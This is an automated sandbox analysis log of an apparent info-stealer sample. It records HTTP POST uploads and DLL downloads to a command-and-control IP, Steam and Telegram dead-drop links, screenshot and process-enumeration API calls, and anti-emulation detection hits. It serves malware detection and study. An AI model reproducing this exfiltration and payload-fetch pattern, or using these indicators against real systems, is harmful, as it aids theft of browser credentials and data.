                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAFBFIEHIDBGDHCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 131529Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004041DB _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_004041DB
                      Source: global traffic | HTTP traffic detected: GET /profiles/76561199681720597 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 | Host: 65.109.242.112 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /sqlx.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 | Host: 65.109.242.112 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 | Host: 65.109.242.112 | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 | Host: 65.109.242.112 | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 | Host: 65.109.242.112 | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 | Host: 65.109.242.112 | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 | Host: 65.109.242.112 | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 | Host: 65.109.242.112 | Cache-Control: no-cache
                      Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                      Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECA | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 | Host: 65.109.242.112 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: file.exe, 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199681720597
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199681720597/badges
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199681720597/inventory/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199681720597GL
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199681720597eL
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
                      Source: 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
                      Source: 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                      Source: AEHIEC.2.drString found in binary or memory: https://support.mozilla.org
                      Source: AEHIEC.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: AEHIEC.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                      Source: file.exe, 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/talmatin
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: EBAFBG.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                      Source: EBAFBG.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/WHpWtlueYcBpS.exe
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/v4.0.30319
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%2
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                      Source: unknown; HTTPS traffic detected: 23.195.238.96:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 65.109.242.112:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_004112E3 _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow

                      System Summary

                      Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                      Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                      Source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                      Source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_6CA262C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93FC802_2_6C93FC80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9DDCD02_2_6C9DDCD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C961CE02_2_6C961CE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8B1C302_2_6C8B1C30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8A3C402_2_6C8A3C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9C9C402_2_6C9C9C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C893D802_2_6C893D80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E9D902_2_6C9E9D90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C971DC02_2_6C971DC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C903D002_2_6C903D00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8C3EC02_2_6C8C3EC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9ADE102_2_6C9ADE10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CA25E602_2_6CA25E60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9FBE702_2_6C9FBE70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8C1F902_2_6C8C1F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9BDFC02_2_6C9BDFC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CA23FC02_2_6CA23FC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C94BFF02_2_6C94BFF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A3F302_2_6C9A3F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8D5F202_2_6C8D5F20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C895F302_2_6C895F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9F7F202_2_6C9F7F20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93F8C02_2_6C93F8C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C97F8F02_2_6C97F8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8AD8E02_2_6C8AD8E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8D38E02_2_6C8D38E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9FB8F02_2_6C9FB8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8FD8102_2_6C8FD810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9738402_2_6C973840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9719902_2_6C971990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8B19802_2_6C8B1980
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9399C02_2_6C9399C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8D99D02_2_6C8D99D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9059F02_2_6C9059F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9379F02_2_6C9379F0
                      Source: C:\Users\user\Desktop\file.exe Code function: String function: 00632356 appears 55 times
                      Source: C:\Users\user\Desktop\file.exe Code function: String function: 006C3DA8 appears 37 times
                      Source: C:\Users\user\Desktop\file.exe Code function: String function: 0063326A appears 45 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004024FF appears 312 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8FC5E0 appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CA209D0 appears 282 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0041820E appears 103 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8C3620 appears 74 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8C9B10 appears 85 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CA2D930 appears 51 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C9D9F30 appears 33 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CA2DAE0 appears 63 times
                      Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/25@1/2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C900300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,2_2_6C900300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004111A4 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041070C CoCreateInstance,SysAllocString,SysFreeString,_wtoi64,SysFreeString,SysFreeString,2_2_0041070C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199681720597[1].htm
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini
                      Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
